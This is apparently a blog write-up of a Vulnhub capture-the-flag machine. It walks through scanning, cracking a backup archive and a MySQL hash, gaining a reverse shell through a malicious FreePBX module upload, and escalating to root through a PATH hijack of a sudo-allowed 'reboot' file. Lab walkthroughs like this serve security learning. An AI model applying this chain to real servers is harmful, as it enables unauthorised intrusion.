My Communication Server :1

A-s4t0sh
7 min readApr 18, 2021

--

MY-COMMUNICATION-SERVER :1

As the description of the machine on Vulnhub given by the author tells us to change the MAC address of the Adapter to let the machine take IP.

Before proceeding forward lets have a look at the description of the machine

So starting with the changes to be made :

MY-COMMUNICATION-SERVER :1
MY-COMMUNICATION-SERVER :1

After this without wasting my time I switched the machine on and started the enumeration with the IP scan :

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# netdiscover -i vboxnet0 130 ⨯
Currently scanning: 192.168.154.0/16 | Screen View: Unique Hosts

3 Captured ARP Req/Rep packets, from 2 hosts. Total size: 126
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 08:00:27:45:87:a3 1 42 PCS Systemtechnik GmbH
192.168.56.14 08:00:27:e1:48:f2 2 84 PCS Systemtechnik GmbH

Here I got the Machine IP next step is to scan it’s Port :

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# nmap -v -p- -A -sT 192.168.56.14

Nmap scan report for 192.168.56.14
Host is up (0.00076s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 df:ba:c4:5c:5b:6a:ca:b9:f9:94:3a:99:30:5b:33:57 (DSA)
|_ 2048 b9:08:e5:32:8a:56:ca:0a:1a:1c:e7:d7:9f:07:92:31 (RSA)
53/tcp open tcpwrapped
80/tcp open http Apache httpd 2.2.15 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries
|_/ /backup.7z
|_http-server-header: Apache/2.2.15 (CentOS)
| http-title: 404 Not Found
|_Requested resource was config.php
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-03-23T16:30:17
| Not valid after: 2021-03-23T16:30:17
| MD5: f4bf a335 3e11 6420 c896 25b5 a865 1230
|_SHA-1: 02d1 5f78 6b1c e378 5486 50eb a6f2 7a4b e326 7491
|_ssl-date: 2021-04-13T20:36:39+00:00; +5h29m58s from scanner time.
5038/tcp open asterisk Asterisk Call Manager 2.10.0
8088/tcp open http Asterisk 13.17.0
|_http-server-header: Asterisk/13.17.0
|_http-title: 404 Not Found
8089/tcp open ssl/http Asterisk 13.17.0
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=localhost.localdomain
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-03-23T16:28:55
| Not valid after: 2030-03-21T16:28:55
| MD5: 91bd 0f13 17a1 4729 b095 daae a5f6 a6f8
|_SHA-1: 4fc7 5b35 f399 3849 ed2d f963 4ade 735d 1525 5169
|_ssl-date: 2021-04-13T20:36:39+00:00; +5h29m58s from scanner time.

Here I got few services that are running on it, that seems to a communication server as the name of the machine says itself. Asterisk and FreePBX services are running on ports 8088 and 5038 respectively. But the version of the services are not vulnerable.

Next I switched on web to enumerate further. Here I got the service page of FreePBX.

FreePBX 2.10.0 MY-COMMUNICATION-SERVER :1

Nmap report get the robots.txt page having two disallowed directories as shown below :

MY-COMMUNICATION-SERVER :1/robots.txt

I downloaded the file but can’t open it as it is a password protected file, after wandering on the web for around 10–15 minutes I came around a script that generates the hash for the password of the .7z file. (Refrence ) Tish a python script.

Finally got the hash after running the script and redirected the output in a file named hash.txt.

┌──(s4t0sh㉿N4TR0)-[/home/s4t0sh/Downloads]
└─$ python 7z2j.py backup.7z > hash.txt

I used hachcat to crack the hash to get the password .

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# john -wordlist=/usr/share/wordlists/rockyou.txt Downloads/hash.txt
MY-COMMUNICATION-SERVER :1, hashcat result

Without wondering here and there I unzipped the file and got the credentials of a ftp user and the IP as well. most interesting thing here is that the IP given by the author in the machine is the IP of my own machine.

FTP credentials for MY-COMMUNICATION-SERVER

The file hints that server will sent a backup file to a FTP server running on the host machine having IP 192.168.56.1 with the user “armour” and password “armour” on the default port no. 21.

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# pip install pyftpdlib

Here I installed the required library file for FTP server. then made a python script to run a temporary FTP server as shown below :

FTP server script for MY-COMMUNICATION-SERVER :1

To get the backup in a specified directory that I have mentioned in the python script, I created a directory named ftp and changed the ownership of the directory with the following cmd.

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# chown nobody:nogroup ftp

Here I all set to receive the backup file so running the script with get the backup in FTP directory.

──(root💀N4TR0)-[/home/s4t0sh/]
└─# python3 ftp-server.py

/usr/lib/python3/dist-packages/pyftpdlib/authorizers.py:243: RuntimeWarning: write permissions assigned to anonymous user.
warnings.warn("write permissions assigned to anonymous user.",
[I 2021-04-17 19:12:26] >>> starting FTP server on 192.168.56.1:21, pid=5715 <<<
[I 2021-04-17 19:12:26] concurrency model: async
[I 2021-04-17 19:12:26] masquerade (NAT) address: None
[I 2021-04-17 19:12:26] passive ports: None
[I 2021-04-17 19:12:48] 192.168.56.1:53038-[] FTP session opened (connect)
[I 2021-04-17 19:12:54] 192.168.56.1:53038-[armour] USER 'armour' logged in.
[I 2021-04-17 19:16:05] 192.168.56.14:40332-[] FTP session opened (connect)
[I 2021-04-17 19:16:05] 192.168.56.14:40332-[armour] USER 'armour' logged in.
[I 2021-04-17 19:16:05] 192.168.56.14:40332-[armour] MKD /home/s4t0sh/ftp/backup 257
[I 2021-04-17 19:16:05] 192.168.56.14:40332-[armour] MKD /home/s4t0sh/ftp/backup/Default_backup 257
[I 2021-04-17 19:16:05] 192.168.56.14:40332-[armour] STOR /home/s4t0sh/ftp/backup/Default_backup/20210418-004602-1618686962-13.0.192.16-522911139.tgz completed=1 bytes=1053752 seconds=0.068
[I 2021-04-17 19:16:05] 192.168.56.14:40332-[armour] FTP session closed (disconnect).

Having look at the backup file it seems to be a tar file so I untared it.

┌──(s4t0sh㉿N4TR0)-[/home/s4t0sh/ftp/backup/Default_backup]
└─$ ls
20210418-004602-1618686962-13.0.192.16-522911139.tgz
┌──(root💀N4TR0)-[/home/s4t0sh/ftp/backup/Default_backup]
└─# tar -xvf 20210418–004602–1618686962–13.0.192.16–522911139.tgz

After untarring the file I jumped in to the directory I got. Here again I got a mysql-2.sql.gz named file which is also a zip file again doing the same thing. got the config file of MYSQL with the uaser named and password in hash format.

┌──(root💀N4TR0)-[/home/s4t0sh/ftp/backup/Default_backup]
└─# gunzip mysql-2.sql.gz
MYSQL Credentials MY-COMMUNICATION-SERVER :1
admin::6d72a543f1fd94e804492d4eea33796c9425931

Cracking the hash with hashcat is the very next step that should be taken by us if having the hash to get the plain password.

┌──(root💀N4TR0)-[/home/s4t0sh/ftp/backup/Default_backup]
└─# hashcat -m 100 -a 0 wp.txt /usr/share/wordlists/rockyou.txt 255 ⨯
hashcat (v6.1.1) starting...
Hachcat result MY-COMMUNICATION-SERVER :1
6d72a543f1fd94e804492d4eea33796c9425931a:fuckroot1

Here is the admin credentials for FreePBX Administrator. Getting loggedin with them I wandered their for a few minutes and got the module upload facility so I searched the web for any module if present and I got it. ( Refrence)

Created a directory and copied php-reverse-shell code in a install.php file after doing all modifications needed. and another file named module.xml and pasted the code from the refrence link in that.

Then to upload it I used to zip it and uploaded it on the machine.

Module upload Facility MY-COMMUNICATION-SERVER :1

After successfully uploading it a proceeded to install it but before that I put a listner on the other hand.

Module Installation MY-COMMUNICATION-SERVER :1
Module Installed MY-COMMUNICATION-SERVER :1

And yuppp!!!!

I got the shell but not the tty so I used the python cmd to get the tty shell.

Listner MY-COMMUNICATION-SERVER :1
Shell called MY-COMMUNICATION-SERVER :1

Here the first thing I used to do is to check the sudoer permissions if any, so a file named reboot has the permission to run as root.

I moved in the /tmp directory and created a reboot named file with the code to get the root shell.

shell cmd in reboot file MY-COMMUNICATION-SERVER :1

After all this I have given all permissions to that file using chmod cmd.

bash-4.1$ chmod +x reboot

Then I changed the PATH variable to /tmp.

bash-4.1$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
bash-4.1$ echo $PATH
echo $PATH
/tmp:/sbin:/usr/sbin:/bin:/usr/bin

Here I put a listner on the port 1111 to get the root shell symultaniously I called the reboot named file that I created in tmp directory as a sudoer user.

reboot MY-COMMUNICATION-SERVER :1
Root Shell MY-COMMUNICATION-SERVER :1

YOPP!!!!! Got the shell.

MY-COMMUNICATION-SERVER 💯

And the proof .🍾🍾🤩🤩🥳🥳

Hope you Enjoyed reading it.

Corrections to be made if any, DM A-s4t0sh OR ashutoshsinghumath11082001@gmail.com .

--

--

No responses yet